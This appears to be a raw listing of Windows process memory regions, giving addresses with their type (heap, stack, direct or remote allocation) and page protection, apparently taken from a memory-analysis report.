2085DCDE000
heap
page read and write
2085E575000
heap
page read and write
2085E153000
heap
page read and write
2085F13B000
heap
page read and write
185B9853000
heap
page read and write
2085E4EA000
heap
page read and write
25EFD905000
heap
page read and write
C9F4FBD000
stack
page read and write
7FF8E6FB1000
unkown
page execute read
2085E08E000
heap
page read and write
20860120000
direct allocation
page read and write
2085DBF7000
heap
page read and write
18FDF277000
heap
page read and write
20860130000
direct allocation
page read and write
171C4349000
heap
page read and write
185BBE45000
heap
page read and write
185BB674000
heap
page read and write
18A3D940000
heap
page read and write
185BBE3D000
heap
page read and write
185BBBA7000
heap
page read and write
185BC867000
heap
page read and write
2085E1C2000
heap
page read and write
185BB72E000
heap
page read and write
25EFD913000
heap
page read and write
4EABDCE000
stack
page read and write
2085E26A000
heap
page read and write
185BCAB0000
heap
page read and write
7FF8E6F64000
unkown
page read and write
7FF8F9180000
unkown
page readonly
185BB407000
heap
page read and write
2085DAD0000
direct allocation
page read and write
2085E80F000
heap
page read and write
7FF8E701B000
unkown
page readonly
185BBEBA000
heap
page read and write
185BB39D000
heap
page read and write
7FF8E6F26000
unkown
page readonly
185BB83A000
heap
page read and write
185BD7F0000
direct allocation
page read and write
171C43CB000
heap
page read and write
2085E187000
heap
page read and write
24F21CF2000
heap
page read and write
185BBE36000
heap
page read and write
2085DC8C000
heap
page read and write
185BBEB1000
heap
page read and write
185BB77B000
heap
page read and write
2085E480000
heap
page read and write
281E0120000
heap
page read and write
7FF8F6FA0000
unkown
page readonly
2085DC5D000
heap
page read and write
2085E249000
heap
page read and write
25EFD902000
heap
page read and write
7FF8F6FA0000
unkown
page readonly
7FF8F8580000
unkown
page read and write
7FF8E5971000
unkown
page execute read
185BB72B000
heap
page read and write
185BC8B7000
heap
page read and write
7FF8F3F34000
unkown
page readonly
4EAC1AE000
stack
page read and write
7FF8E6FC3000
unkown
page readonly
20860120000
direct allocation
page read and write
25EE480E000
heap
page read and write
2085F1E6000
heap
page read and write
7FF7C3CE0000
unkown
page readonly
DA73BFF000
stack
page read and write
2085DCCB000
heap
page read and write
25EFD905000
heap
page read and write
185BBD50000
heap
page read and write
185BBF39000
heap
page read and write
2085E697000
heap
page read and write
28CCB3C1000
heap
page read and write
2085DCC0000
heap
page read and write
7FF8E7DD0000
unkown
page write copy
2085E4DE000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085E771000
heap
page read and write
2085E49E000
heap
page read and write
2085C29C000
heap
page read and write
185BC7B9000
heap
page read and write
7FF8E6F61000
unkown
page execute read
7FF8E6F33000
unkown
page readonly
185BB36A000
heap
page read and write
2085E5A7000
heap
page read and write
171C43B2000
heap
page read and write
2085E674000
heap
page read and write
185BBEFA000
heap
page read and write
185BB339000
heap
page read and write
185BBEB4000
heap
page read and write
2085E0F5000
heap
page read and write
185BBDD5000
heap
page read and write
185BC898000
heap
page read and write
185BBD68000
heap
page read and write
185BBD29000
heap
page read and write
2085F0B2000
heap
page read and write
2085E498000
heap
page read and write
18FDF267000
heap
page read and write
25308730000
heap
page read and write
185BB419000
heap
page read and write
29F58010000
heap
page read and write
2085E152000
heap
page read and write
2085E48D000
heap
page read and write
1C5A7130000
heap
page read and write
2085E6AD000
heap
page read and write
2085DC94000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185BBF48000
heap
page read and write
25EE47E6000
heap
page read and write
2085E16B000
heap
page read and write
185BD110000
direct allocation
page read and write
2085F21E000
heap
page read and write
185BB768000
heap
page read and write
185BD7F0000
direct allocation
page read and write
185BC872000
heap
page read and write
2085E722000
heap
page read and write
7FF67A600000
unkown
page readonly
24C75920000
heap
page read and write
185BBD8F000
heap
page read and write
185BBDD2000
heap
page read and write
2085E5D1000
heap
page read and write
2085E80E000
heap
page read and write
185BB3E6000
heap
page read and write
185BB84B000
heap
page read and write
185BBD9E000
heap
page read and write
185BB6D5000
heap
page read and write
2085E77D000
heap
page read and write
185BB33E000
heap
page read and write
2085E7B0000
heap
page read and write
185BB845000
heap
page read and write
185BBF4A000
heap
page read and write
185BC8B9000
heap
page read and write
2085DC36000
heap
page read and write
25EFD913000
heap
page read and write
185BCA11000
heap
page read and write
2085F0E5000
heap
page read and write
185BBD38000
heap
page read and write
2085E6FA000
heap
page read and write
185BC7B2000
heap
page read and write
2085E25C000
heap
page read and write
281E02A0000
heap
page read and write
185BBC1B000
heap
page read and write
185BC8CF000
heap
page read and write
18FDF277000
heap
page read and write
7FF8F7EC6000
unkown
page readonly
2085DBF4000
heap
page read and write
53167FF000
stack
page read and write
7FF8E63BF000
unkown
page readonly
2085E1D7000
heap
page read and write
185BC7A2000
heap
page read and write
2085E1B3000
heap
page read and write
185BB739000
heap
page read and write
185BD810000
direct allocation
page read and write
2085F11D000
heap
page read and write
185BB75C000
heap
page read and write
2085E078000
heap
page read and write
185BC7A0000
heap
page read and write
7FF8F83DB000
unkown
page read and write
20860110000
direct allocation
page read and write
2085E689000
heap
page read and write
25EFD905000
heap
page read and write
185BB6B8000
heap
page read and write
2085DC32000
heap
page read and write
7FF8E7CD9000
unkown
page read and write
7FF8E7A85000
unkown
page readonly
25EFD905000
heap
page read and write
185BBD67000
heap
page read and write
2085C1F0000
heap
page read and write
26027D00000
heap
page read and write
26027EF0000
heap
page read and write
2085E205000
heap
page read and write
24F21CCD000
heap
page read and write
2085DCD4000
heap
page read and write
7FF8E5C28000
unkown
page execute read
2085E09C000
heap
page read and write
18FDF272000
heap
page read and write
185BB3C8000
heap
page read and write
185BBEDA000
heap
page read and write
185BBD28000
heap
page read and write
2085E72C000
heap
page read and write
2085F106000
heap
page read and write
185BB1FC000
direct allocation
page read and write
185BCAD0000
heap
page read and write
25EFD913000
heap
page read and write
2085E096000
heap
page read and write
185BC878000
heap
page read and write
7FF8F7A91000
unkown
page execute read
7FF7C3D0B000
unkown
page readonly
25EFD904000
heap
page read and write
185BB34A000
heap
page read and write
7FF8FF5D8000
unkown
page read and write
7FF8E7DCF000
unkown
page read and write
2085E19E000
heap
page read and write
185BB3C8000
heap
page read and write
25EFD913000
heap
page read and write
FB5C0FF000
stack
page read and write
185BB74E000
heap
page read and write
185BC87B000
heap
page read and write
185BB82C000
heap
page read and write
2085E6BB000
heap
page read and write
22F70195000
heap
page read and write
21D976CA000
heap
page read and write
7FF8F8BB4000
unkown
page readonly
185BB80C000
heap
page read and write
2085E1DB000
heap
page read and write
2085FC54000
direct allocation
page read and write
2085F095000
heap
page read and write
D9013DF000
stack
page read and write
1F32FEBA000
heap
page read and write
7FF8E68B0000
unkown
page readonly
185BBEFA000
heap
page read and write
210407A0000
heap
page read and write
185BB6E2000
heap
page read and write
185BC80A000
heap
page read and write
24C758FB000
heap
page read and write
2085DC56000
heap
page read and write
185BCA50000
heap
page read and write
185BC8CF000
heap
page read and write
21D976F4000
heap
page read and write
185BC86F000
heap
page read and write
185BBEB3000
heap
page read and write
7FF8F6FA6000
unkown
page readonly
185BC8D4000
heap
page read and write
25EE4750000
heap
page read and write
171C4280000
remote allocation
page read and write
7FF8F875E000
unkown
page readonly
18FDF271000
heap
page read and write
21D820F1000
heap
page read and write
185BBE4C000
heap
page read and write
2085F10B000
heap
page read and write
2085F1D8000
heap
page read and write
25EFD912000
heap
page read and write
185BBB94000
heap
page read and write
20860120000
direct allocation
page read and write
2085DC1A000
heap
page read and write
7FF8E6F40000
unkown
page readonly
7FF8E6FE0000
unkown
page readonly
185BB680000
heap
page read and write
7FF8E6F21000
unkown
page execute read
25EFD905000
heap
page read and write
185BB72C000
heap
page read and write
7FF8E6FA3000
unkown
page readonly
25EFD912000
heap
page read and write
20860140000
direct allocation
page read and write
2085E6FA000
heap
page read and write
2085E4A9000
heap
page read and write
7FF8E77AD000
unkown
page readonly
185BB3DD000
heap
page read and write
185BB3C8000
heap
page read and write
185BB7C3000
heap
page read and write
25EFD905000
heap
page read and write
7FF8E7FF1000
unkown
page execute read
25EFD912000
heap
page read and write
185BB67D000
heap
page read and write
185BB82C000
heap
page read and write
2085E683000
heap
page read and write
2085C2A7000
heap
page read and write
171C43B2000
heap
page read and write
185BBD28000
heap
page read and write
2085E53B000
heap
page read and write
185BC7AA000
heap
page read and write
2085E0C0000
heap
page read and write
18FDF277000
heap
page read and write
185BBD50000
heap
page read and write
185BB3E7000
heap
page read and write
2085DBEF000
heap
page read and write
2085E5A7000
heap
page read and write
1C5A6F31000
heap
page read and write
185BBE9E000
heap
page read and write
185BC7AB000
heap
page read and write
185BCAD0000
heap
page read and write
2085E0A2000
heap
page read and write
185BBB94000
heap
page read and write
185BB6D7000
heap
page read and write
2085EAA0000
direct allocation
page read and write
185BBD9E000
heap
page read and write
2085E0C2000
heap
page read and write
185BB66C000
heap
page read and write
2085E219000
heap
page read and write
185BB6D5000
heap
page read and write
7FF8F844B000
unkown
page read and write
25EFD90C000
heap
page read and write
185B983C000
heap
page read and write
2085F082000
heap
page read and write
185BB3CD000
heap
page read and write
2085DC1A000
heap
page read and write
2085E637000
heap
page read and write
20860120000
direct allocation
page read and write
185BB7C9000
heap
page read and write
2085E500000
heap
page read and write
20860130000
direct allocation
page read and write
20860160000
direct allocation
page read and write
20860140000
direct allocation
page read and write
185BB7D3000
heap
page read and write
28CCB377000
heap
page read and write
25EE481B000
heap
page read and write
2085F118000
heap
page read and write
2085E697000
heap
page read and write
185BB67C000
heap
page read and write
21D97706000
heap
page read and write
2085E4E1000
heap
page read and write
2085E77D000
heap
page read and write
7FF8E60AC000
unkown
page write copy
2085E5B1000
heap
page read and write
185BB397000
heap
page read and write
2085F113000
heap
page read and write
26027D51000
heap
page read and write
7FF8E6F11000
unkown
page execute read
185BC827000
heap
page read and write
2085E08C000
heap
page read and write
185BB377000
heap
page read and write
7FF8E63C2000
unkown
page readonly
7FF8E63B5000
unkown
page readonly
185BB321000
heap
page read and write
7FF8E6FA5000
unkown
page readonly
7FF8F8300000
unkown
page readonly
2085C2A2000
heap
page read and write
185BB7E6000
heap
page read and write
71A7AFD000
stack
page read and write
2085E591000
heap
page read and write
2085DCAC000
heap
page read and write
2085E251000
heap
page read and write
25EFD911000
heap
page read and write
29F5805E000
heap
page read and write
2085F149000
heap
page read and write
2085F24E000
heap
page read and write
185B984A000
heap
page read and write
7FF8E6F80000
unkown
page readonly
185BB3EA000
heap
page read and write
25EFD904000
heap
page read and write
18FDF271000
heap
page read and write
185BBEB4000
heap
page read and write
185BBC18000
heap
page read and write
185BB7C6000
heap
page read and write
185BD7F0000
direct allocation
page read and write
D9015CF000
stack
page read and write
185BB775000
heap
page read and write
5B2ECFE000
unkown
page read and write
1A3D4FD000
stack
page read and write
A8D34FE000
stack
page read and write
171C43CB000
heap
page read and write
2085F239000
heap
page read and write
1F32FE3D000
heap
page read and write
18FDF278000
heap
page read and write
25EFD905000
heap
page read and write
7FF7C3D20000
unkown
page read and write
2085E5A9000
heap
page read and write
7FF8E7A63000
unkown
page readonly
2085C2A7000
heap
page read and write
185BC87B000
heap
page read and write
185BB720000
heap
page read and write
2085F369000
heap
page read and write
185BD26C000
direct allocation
page read and write
7FF8F8740000
unkown
page readonly
185BD6BF000
heap
page read and write
185BD7D0000
direct allocation
page read and write
2085FA4C000
direct allocation
page read and write
2085E204000
heap
page read and write
7FF8E7337000
unkown
page execute read
185BB6C0000
heap
page read and write
2085DC66000
heap
page read and write
2085F07B000
heap
page read and write
185BB7D3000
heap
page read and write
185BBD28000
heap
page read and write
2085E6AE000
heap
page read and write
7FF8E6F24000
unkown
page readonly
185BC7C5000
heap
page read and write
7FF8F8470000
unkown
page readonly
7FF67A640000
unkown
page read and write
2085DC5D000
heap
page read and write
185BCAD8000
heap
page read and write
185BBC1D000
heap
page read and write
28CCB300000
heap
page read and write
2085E190000
heap
page read and write
25EFD90C000
heap
page read and write
185BD7F0000
direct allocation
page read and write
25EFD905000
heap
page read and write
25EE47F0000
heap
page read and write
18FDF26A000
heap
page read and write
20860180000
direct allocation
page read and write
185BB6B8000
heap
page read and write
25EFD90C000
heap
page read and write
2085E4E3000
heap
page read and write
7FF67A63E000
unkown
page write copy
25EFD912000
heap
page read and write
4BC9D0C000
stack
page read and write
2085C2CD000
heap
page read and write
2085E798000
heap
page read and write
2085E499000
heap
page read and write
7FF8F8550000
unkown
page readonly
2085F0BE000
heap
page read and write
185BC80D000
heap
page read and write
185BBEB4000
heap
page read and write
7FF8F8BB5000
unkown
page read and write
2085F0CA000
heap
page read and write
B16CAFE000
unkown
page read and write
2085E55A000
heap
page read and write
7FF8F8D81000
unkown
page execute read
7FF8F7A04000
unkown
page readonly
185BC753000
heap
page read and write
7FF8E70D7000
unkown
page readonly
20860278000
direct allocation
page read and write
185BB3A5000
heap
page read and write
185BB407000
heap
page read and write
18C8ADA0000
heap
page read and write
185BC7C5000
heap
page read and write
185BB3BE000
heap
page read and write
18FDF271000
heap
page read and write
7FF8E777F000
unkown
page readonly
185BB3DC000
heap
page read and write
185BBF0F000
heap
page read and write
185BD260000
direct allocation
page read and write
2085E71D000
heap
page read and write
D9011D5000
stack
page read and write
2085E11C000
heap
page read and write
185BBF49000
heap
page read and write
185BB3FA000
heap
page read and write
1F32FE67000
heap
page read and write
2085F0C2000
heap
page read and write
7FF8F8365000
unkown
page readonly
7FF8E7E05000
unkown
page read and write
2085E674000
heap
page read and write
7FF8E5ACF000
unkown
page readonly
2085E596000
heap
page read and write
18FDF26A000
heap
page read and write
7FF8E77C9000
unkown
page readonly
2085E63B000
heap
page read and write
18FDF271000
heap
page read and write
1F32FDC0000
heap
page read and write
18FDF275000
heap
page read and write
171C4160000
heap
page read and write
2085E0D3000
heap
page read and write
185BCAD0000
heap
page read and write
2085E0F5000
heap
page read and write
7FF8F8751000
unkown
page execute read
185BB7BE000
heap
page read and write
7FF8E6F20000
unkown
page readonly
20D491B5000
heap
page read and write
2085E1F7000
heap
page read and write
2085E249000
heap
page read and write
25EFD905000
heap
page read and write
185BB3DF000
heap
page read and write
18A3D771000
heap
page read and write
185BCA50000
heap
page read and write
2085FAC0000
direct allocation
page read and write
2085E667000
heap
page read and write
185BB849000
heap
page read and write
2085E1A7000
heap
page read and write
7FF8F7A90000
unkown
page readonly
25EFD905000
heap
page read and write
2085E5B1000
heap
page read and write
185BBEDA000
heap
page read and write
185BBB7B000
heap
page read and write
185BBF54000
heap
page read and write
2085E560000
heap
page read and write
18FDF277000
heap
page read and write
185BBC18000
heap
page read and write
20860160000
direct allocation
page read and write
18FDF26A000
heap
page read and write
512E8FC000
stack
page read and write
185BBE14000
heap
page read and write
185BD1D4000
direct allocation
page read and write
185BB180000
direct allocation
page read and write
2085E0B7000
heap
page read and write
185BBCAF000
heap
page read and write
2085DCAC000
heap
page read and write
2085E203000
heap
page read and write
7FF8F9184000
unkown
page read and write
7FF8F3F34000
unkown
page read and write
2085F10B000
heap
page read and write
2085E71D000
heap
page read and write
2085E55B000
heap
page read and write
2085F2D9000
heap
page read and write
18FDF278000
heap
page read and write
185B984F000
heap
page read and write
185B9848000
heap
page read and write
185BBE2D000
heap
page read and write
185BB728000
heap
page read and write
185BD482000
heap
page read and write
2085F0E3000
heap
page read and write
7FF8E6703000
unkown
page read and write
2085C29D000
heap
page read and write
7FF8E71BB000
unkown
page read and write
7FF8F8D81000
unkown
page execute read
7FF8F8460000
unkown
page readonly
185BCAC5000
heap
page read and write
28CCB3CE000
heap
page read and write
24A03CA0000
heap
page read and write
7FF8F83BB000
unkown
page readonly
2085DC5A000
heap
page read and write
7FF8E6F30000
unkown
page readonly
138D1DF000
stack
page read and write
185BD7C0000
direct allocation
page read and write
2085DC07000
heap
page read and write
2085E55A000
heap
page read and write
2085E4CB000
heap
page read and write
2085E660000
heap
page read and write
1F32FE48000
heap
page read and write
185BBF08000
heap
page read and write
28CCB200000
heap
page read and write
185BD830000
direct allocation
page read and write
18FDF272000
heap
page read and write
185BBC31000
heap
page read and write
185BD170000
direct allocation
page read and write
2085E4E9000
heap
page read and write
185BD944000
direct allocation
page read and write
7FF8E66FD000
unkown
page read and write
7FF8E7134000
unkown
page readonly
2085E489000
heap
page read and write
2085F239000
heap
page read and write
21D9771C000
heap
page read and write
2085DCD4000
heap
page read and write
185BC763000
heap
page read and write
2085E515000
heap
page read and write
2085E674000
heap
page read and write
2085E6E9000
heap
page read and write
2085F278000
heap
page read and write
185BD7F0000
direct allocation
page read and write
7FF67A642000
unkown
page readonly
25EE480E000
heap
page read and write
7FF8F8BC8000
unkown
page read and write
2085E0C8000
heap
page read and write
2085E177000
heap
page read and write
18FDF26A000
heap
page read and write
B167EFE000
stack
page read and write
185BB75C000
heap
page read and write
185BB6DC000
heap
page read and write
7FF8E5BF2000
unkown
page read and write
185BBF5C000
heap
page read and write
185BBD50000
heap
page read and write
2085E54E000
heap
page read and write
29F57FB0000
remote allocation
page read and write
2085F069000
heap
page read and write
2085F22B000
heap
page read and write
EA592FC000
stack
page read and write
2085E637000
heap
page read and write
185BC8CF000
heap
page read and write
185BC8B3000
heap
page read and write
185BCA14000
heap
page read and write
185BB3A6000
heap
page read and write
2085F12C000
heap
page read and write
20860150000
direct allocation
page read and write
7FF8F8D82000
unkown
page readonly
1C5A6F1D000
heap
page read and write
2BE0CC14000
heap
page read and write
21D9770C000
heap
page read and write
7FF8E68B1000
unkown
page execute read
2085E772000
heap
page read and write
2085DC97000
heap
page read and write
2085E637000
heap
page read and write
28CCB3AA000
heap
page read and write
2085F1E6000
heap
page read and write
185BD7D0000
direct allocation
page read and write
7FF67A62B000
unkown
page readonly
28CCB3C1000
heap
page read and write
2085F40D000
heap
page read and write
185BB349000
heap
page read and write
185BC825000
heap
page read and write
2085E1B9000
heap
page read and write
185BB140000
heap
page read and write
2085E1DB000
heap
page read and write
7FF8E667A000
unkown
page read and write
2085E4A9000
heap
page read and write
7FF8E6FB2000
unkown
page readonly
185BB780000
heap
page read and write
2085DCD3000
heap
page read and write
2085F14F000
heap
page read and write
2085DCAC000
heap
page read and write
7FF8E7FF9000
unkown
page readonly
18FDF210000
heap
page read and write
185BB83B000
heap
page read and write
185BB71B000
heap
page read and write
2085F1D4000
heap
page read and write
2085E7B0000
heap
page read and write
7FF8E6FC1000
unkown
page execute read
25EFD912000
heap
page read and write
185BBBF8000
heap
page read and write
185BCAD3000
heap
page read and write
2085E116000
heap
page read and write
185BBEA7000
heap
page read and write
7FF8F7A0B000
unkown
page readonly
185B985B000
heap
page read and write
2085E26E000
heap
page read and write
7FF8F8375000
unkown
page readonly
2085F370000
heap
page read and write
7FF7C3D1E000
unkown
page read and write
185BD7D0000
direct allocation
page read and write
185BC4E0000
direct allocation
page read and write
185BB3BF000
heap
page read and write
7FF8E6FA1000
unkown
page execute read
296125E0000
remote allocation
page read and write
2085FC64000
direct allocation
page read and write
185BB3B1000
heap
page read and write
7FF8F7AA3000
unkown
page readonly
279B9220000
heap
page read and write
2085E1D7000
heap
page read and write
7FF8E6F25000
unkown
page read and write
185BB3F1000
heap
page read and write
2085E09C000
heap
page read and write
185BC8B7000
heap
page read and write
2085E5D1000
heap
page read and write
26027FF0000
heap
page read and write
18FDF26A000
heap
page read and write
185BD7D0000
direct allocation
page read and write
185BB844000
heap
page read and write
25EFD911000
heap
page read and write
185BC772000
heap
page read and write
185BB6CA000
heap
page read and write
24F21D49000
heap
page read and write
185BB83A000
heap
page read and write
28CCB397000
heap
page read and write
2085E1F7000
heap
page read and write
185BBBF2000
heap
page read and write
2085E6EA000
heap
page read and write
7FF8FF5E0000
unkown
page readonly
185BD820000
direct allocation
page read and write
185BBE5E000
heap
page read and write
18FDF274000
heap
page read and write
2085E493000
heap
page read and write
18FDF277000
heap
page read and write
185BBF60000
direct allocation
page read and write
7FF8F8581000
unkown
page write copy
185BD7C0000
direct allocation
page read and write
2085DCB0000
heap
page read and write
185BD7F0000
direct allocation
page read and write
2085C259000
heap
page read and write
185BD7D0000
direct allocation
page read and write
7FF8E72C8000
unkown
page execute read
18FDF278000
heap
page read and write
2085F126000
heap
page read and write
2085E71D000
heap
page read and write
185BB739000
heap
page read and write
185BC88D000
heap
page read and write
185BB7BB000
heap
page read and write
185BB3CD000
heap
page read and write
18C8AE01000
heap
page read and write
2234A6B0000
heap
page read and write
185BD7D0000
direct allocation
page read and write
7FF8F8305000
unkown
page read and write
7FF8E6F00000
unkown
page readonly
2085F106000
heap
page read and write
185BC89B000
heap
page read and write
7FF8E6503000
unkown
page readonly
185BBB98000
heap
page read and write
24F21CD8000
heap
page read and write
7FF8E717E000
unkown
page readonly
20860180000
direct allocation
page read and write
7FF8E6F91000
unkown
page execute read
7FF8F83C1000
unkown
page execute read
1F32FE3D000
heap
page read and write
2085DC14000
heap
page read and write
2085E1E2000
heap
page read and write
2085DCD4000
heap
page read and write
7FF8E7141000
unkown
page execute read
2085F09E000
heap
page read and write
185BD830000
direct allocation
page read and write
25EE47F9000
heap
page read and write
185BB3CD000
heap
page read and write
185BCACE000
heap
page read and write
1F32FE3D000
heap
page read and write
24F21D49000
heap
page read and write
185BB780000
heap
page read and write
53163CB000
stack
page read and write
25EE47FB000
heap
page read and write
185BB32E000
heap
page read and write
185BB7C3000
heap
page read and write
7FF8E7DDD000
unkown
page readonly
20860100000
direct allocation
page read and write
61616FC000
stack
page read and write
2085E5AE000
heap
page read and write
2085E683000
heap
page read and write
1F32FE33000
heap
page read and write
2085DC4F000
heap
page read and write
7FF8F9189000
unkown
page readonly
185BBD9E000
heap
page read and write
2085E6D4000
heap
page read and write
185BBD94000
heap
page read and write
185BB6B8000
heap
page read and write
7FF8F8303000
unkown
page readonly
24C75750000
heap
page read and write
2B648420000
heap
page read and write
10A3BBF000
stack
page read and write
25EFD905000
heap
page read and write
22F6FDF0000
heap
page read and write
2085E683000
heap
page read and write
185BBC19000
heap
page read and write
185BCACB000
heap
page read and write
185BB699000
heap
page read and write
B167FFF000
stack
page read and write
185BB680000
heap
page read and write
2234A8A0000
heap
page read and write
28CCB370000
heap
page read and write
25EFD905000
heap
page read and write
2085E0DB000
heap
page read and write
B16CBFF000
stack
page read and write
171C4280000
remote allocation
page read and write
7FF8E6F85000
unkown
page readonly
2085F106000
heap
page read and write
18B7EE60000
heap
page read and write
2085E16F000
heap
page read and write
61484FF000
unkown
page read and write
18C8ADF1000
heap
page read and write
185BD840000
direct allocation
page read and write
185BB3DB000
heap
page read and write
7FF8E7255000
unkown
page readonly
7FF8E7BD3000
unkown
page readonly
185BC742000
heap
page read and write
2085EE50000
heap
page read and write
185B986D000
heap
page read and write
25EFD912000
heap
page read and write
7FF8F844D000
unkown
page readonly
7FF7C3D22000
unkown
page readonly
185BBD79000
heap
page read and write
185BCACE000
heap
page read and write
7FF8E760B000
unkown
page readonly
25EE4740000
heap
page read and write
2085E1DB000
heap
page read and write
25EFD905000
heap
page read and write
512EAFF000
stack
page read and write
185BD7D0000
direct allocation
page read and write
2085E0D3000
heap
page read and write
185BBE5E000
heap
page read and write
25EFD90C000
heap
page read and write
185BBE45000
heap
page read and write
2085DBFF000
heap
page read and write
7FF8F8BB0000
unkown
page readonly
2085F0D9000
heap
page read and write
7FF8F83A1000
unkown
page execute read
2085E162000
heap
page read and write
7FF8E70D2000
unkown
page readonly
2085E7BC000
heap
page read and write
25EFD90C000
heap
page read and write
71A7CFE000
stack
page read and write
185BBBEA000
heap
page read and write
2085F164000
heap
page read and write
2085E6BB000
heap
page read and write
7FF8E5FE2000
unkown
page readonly
25EFD90C000
heap
page read and write
185BBDAC000
heap
page read and write
185BCAD8000
heap
page read and write
185BB7C9000
heap
page read and write
2085E683000
heap
page read and write
2085E17F000
heap
page read and write
2085E1D3000
heap
page read and write
2085E157000
heap
page read and write
2085E4A9000
heap
page read and write
185B9821000
heap
page read and write
2085DCDC000
heap
page read and write
7FF8E5C97000
unkown
page execute read
25EE4814000
heap
page read and write
185BBB86000
heap
page read and write
185BBE5E000
heap
page read and write
2BE0CAE0000
heap
page read and write
2085DC85000
heap
page read and write
2085E471000
heap
page read and write
2085E730000
heap
page read and write
20860130000
direct allocation
page read and write
1F32FE62000
heap
page read and write
1F32FEBA000
heap
page read and write
185BD7D0000
direct allocation
page read and write
1C5A7030000
heap
page read and write
18FDF269000
heap
page read and write
20860130000
direct allocation
page read and write
2085E6C3000
heap
page read and write
185BB6D7000
heap
page read and write
2085E493000
heap
page read and write
185BD7F0000
direct allocation
page read and write
4BCA1FF000
stack
page read and write
185BC80C000
heap
page read and write
185BBD28000
heap
page read and write
2085E637000
heap
page read and write
171C435A000
heap
page read and write
29612659000
heap
page read and write
2085DCA3000
heap
page read and write
2085E165000
heap
page read and write
7FF8F7EC0000
unkown
page readonly
2085E5D1000
heap
page read and write
25EFD8FD000
heap
page read and write
2085DC85000
heap
page read and write
7FF8F7A91000
unkown
page execute read
25EE47C0000
heap
page read and write
185BD320000
direct allocation
page read and write
185BBB9C000
heap
page read and write
20860110000
direct allocation
page read and write
20860120000
direct allocation
page read and write
2085DC5E000
heap
page read and write
25EFF410000
heap
page read and write
185BBD9E000
heap
page read and write
24A03B10000
heap
page read and write
B16807F000
stack
page read and write
2085DBFF000
heap
page read and write
7FF8FF5B0000
unkown
page readonly
C47B6FF000
unkown
page read and write
2234A6BB000
heap
page read and write
185BB70B000
heap
page read and write
2085DCA1000
heap
page read and write
2085E190000
heap
page read and write
25EFD905000
heap
page read and write
185BCA04000
heap
page read and write
2085F251000
heap
page read and write
185BB825000
heap
page read and write
185BB6A5000
heap
page read and write
18FDF26A000
heap
page read and write
20860120000
direct allocation
page read and write
2085E190000
heap
page read and write
2085E5AF000
heap
page read and write
2085C2CD000
heap
page read and write
2085DE20000
direct allocation
page read and write
2085F10B000
heap
page read and write
185BBED5000
heap
page read and write
25EFD912000
heap
page read and write
25EFD905000
heap
page read and write
2085E25C000
heap
page read and write
2085F0EC000
heap
page read and write
7FF8F3F31000
unkown
page execute read
185BC8B3000
heap
page read and write
2085DC40000
heap
page read and write
185BD7C0000
direct allocation
page read and write
18FDF275000
heap
page read and write
61618FF000
stack
page read and write
18FDF26A000
heap
page read and write
185BBC06000
heap
page read and write
185BBD28000
heap
page read and write
2085E09C000
heap
page read and write
18FDF271000
heap
page read and write
20D49150000
heap
page read and write
2085DCCB000
heap
page read and write
2085E63F000
heap
page read and write
20860120000
direct allocation
page read and write
185BB674000
heap
page read and write
2085E22C000
heap
page read and write
185BB40D000
heap
page read and write
138D3DE000
stack
page read and write
2085FC40000
direct allocation
page read and write
185BC813000
heap
page read and write
185BBEFA000
heap
page read and write
185BC828000
heap
page read and write
7FF8E7D4A000
unkown
page read and write
2234A6E1000
heap
page read and write
2085DC96000
heap
page read and write
21040580000
heap
page read and write
2085E4FB000
heap
page read and write
185BBD68000
heap
page read and write
2B6485A8000
heap
page read and write
185BBD9D000
heap
page read and write
185BBCB6000
heap
page read and write
185BC89E000
heap
page read and write
185BB3C9000
heap
page read and write
2085DCA0000
heap
page read and write
24F21CCD000
heap
page read and write
2085E598000
heap
page read and write
7FF8F6FAB000
unkown
page readonly
2085E190000
heap
page read and write
24F21CA0000
remote allocation
page read and write
185BB860000
direct allocation
page read and write
2085E1B3000
heap
page read and write
2085DC5A000
heap
page read and write
2961260F000
heap
page read and write
2085DC9B000
heap
page read and write
18FDF26D000
heap
page read and write
7FF8E71B2000
unkown
page readonly
7FF7C3CE1000
unkown
page execute read
185BB80D000
heap
page read and write
185BBECB000
heap
page read and write
279B9020000
heap
page read and write
7FF8F7A06000
unkown
page readonly
185B9861000
heap
page read and write
2085F0E7000
heap
page read and write
2085E0FC000
heap
page read and write
185BBB84000
heap
page read and write
1F32FEBA000
heap
page read and write
185BC824000
heap
page read and write
2085E4DE000
heap
page read and write
185BBE45000
heap
page read and write
2085E71D000
heap
page read and write
2085DC56000
heap
page read and write
2085E0D3000
heap
page read and write
2085F22A000
heap
page read and write
2BE0CE40000
heap
page read and write
185BC776000
heap
page read and write
7FF8F8420000
unkown
page readonly
2085E206000
heap
page read and write
185BB72D000
heap
page read and write
25EFD912000
heap
page read and write
2085C294000
heap
page read and write
185BC7C5000
heap
page read and write
2085DCAC000
heap
page read and write
185BB325000
heap
page read and write
279B9240000
heap
page read and write
7FF8F8542000
unkown
page readonly
1F32FE67000
heap
page read and write
2085DC36000
heap
page read and write
7FF8F8D84000
unkown
page readonly
185BB7B4000
heap
page read and write
7FF8F85DC000
unkown
page readonly
2085E244000
heap
page read and write
2085DC40000
heap
page read and write
185BD830000
direct allocation
page read and write
2085F0D9000
heap
page read and write
25EFD90C000
heap
page read and write
2085E57E000
heap
page read and write
2085F16C000
heap
page read and write
7FF8E7DCE000
unkown
page write copy
2085E154000
heap
page read and write
185BB82A000
heap
page read and write
18FDF277000
heap
page read and write
7FF8F7A06000
unkown
page readonly
185BD7D0000
direct allocation
page read and write
2085E5AC000
heap
page read and write
185BBBB7000
heap
page read and write
25EFD912000
heap
page read and write
2085E1CD000
heap
page read and write
7FF8F8BC9000
unkown
page readonly
21D82220000
heap
page read and write
2085C0C0000
heap
page read and write
29612641000
heap
page read and write
25EFD900000
heap
page read and write
29612642000
heap
page read and write
2085F106000
heap
page read and write
185BC80A000
heap
page read and write
185BB76D000
heap
page read and write
20860100000
direct allocation
page read and write
185BC80A000
heap
page read and write
C47B36C000
stack
page read and write
FB5BD7C000
stack
page read and write
281E0220000
heap
page read and write
2085E491000
heap
page read and write
2085E190000
heap
page read and write
20860140000
direct allocation
page read and write
185BB3B4000
heap
page read and write
2085E49A000
heap
page read and write
2085E267000
heap
page read and write
18B7EC30000
heap
page read and write
7FF8F8561000
unkown
page execute read
25EFD90C000
heap
page read and write
2085E0F5000
heap
page read and write
18FDF270000
heap
page read and write
2085E234000
heap
page read and write
29612673000
heap
page read and write
21D97735000
heap
page read and write
4BCA0FE000
unkown
page read and write
7FF8F8466000
unkown
page readonly
2085F126000
heap
page read and write
